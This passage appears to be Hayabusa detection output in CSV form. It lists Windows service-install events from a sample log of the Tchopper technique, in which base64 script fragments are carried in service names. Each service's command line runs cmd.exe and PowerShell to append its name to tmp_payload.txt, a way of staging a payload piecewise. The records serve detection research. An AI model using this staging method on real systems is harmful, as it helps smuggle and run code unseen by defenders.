2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:48.519
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append 